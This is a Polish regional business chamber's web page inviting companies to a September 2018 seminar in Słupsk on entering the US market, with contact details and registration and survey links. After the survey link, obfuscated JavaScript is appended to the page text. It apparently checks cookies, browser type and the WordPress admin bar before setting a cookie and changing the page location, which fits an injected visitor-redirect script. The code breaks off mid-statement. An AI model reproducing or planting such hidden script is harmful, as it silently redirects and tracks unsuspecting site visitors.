Praktyczne seminarium biznesowe nt. Możliwości biznesowe dla polskich firm na rynku Stanów Zjednoczonych Ameryki | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,

Niniejszym w imieniu Pomorskiej Agencji Rozwoju Regionalnego S.A. oraz Agencji Rozwoju Pomorza S.A – lidera regionalnego projektu „Pomorski Broker Eksportowy”, serdecznie zapraszamy na praktyczne seminarium biznesowe pt. „Discover and expand your business in America” – możliwości biznesowe dla polskich firm na rynku Stanów Zjednoczonych Ameryki„, które odbędzie się w dniu 25 września 2018r. w Słupskim Inkubatorze Technologicznym.

Polnocna-Izba-zaprsza-rynek-amerykanski-zaproszenie Polnocna-Izba-zaprsza-rynek-amerykanski-zaproszenie

Chętne osoby zachęcamy do zgłoszeń w Biurze Północnej Izby Gospodarczej w Koszalinie 943411083 lub mailowo koszalin@izba.info

Rejestracja na wydarzenie: http://www.brokereksportowy.pl/pl/oferta/49-seminaria/seminaria-planowane/220-seminarium-discover-and-expand-your-business-in-america-25-09-2018-slupsk.html

Przygotowaliśmy elektroniczną ankietę dla przedsiębiorców, dzięki której poznamy ich obszar zainteresowania w tematyce seminarium: https://docs.google.com/forms/d/e/1FAIpQLSfuv3xFEX96kGvVn3c-J2D455zrh5HMWMcUaPY8q3RaGvxn0w/viewform 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m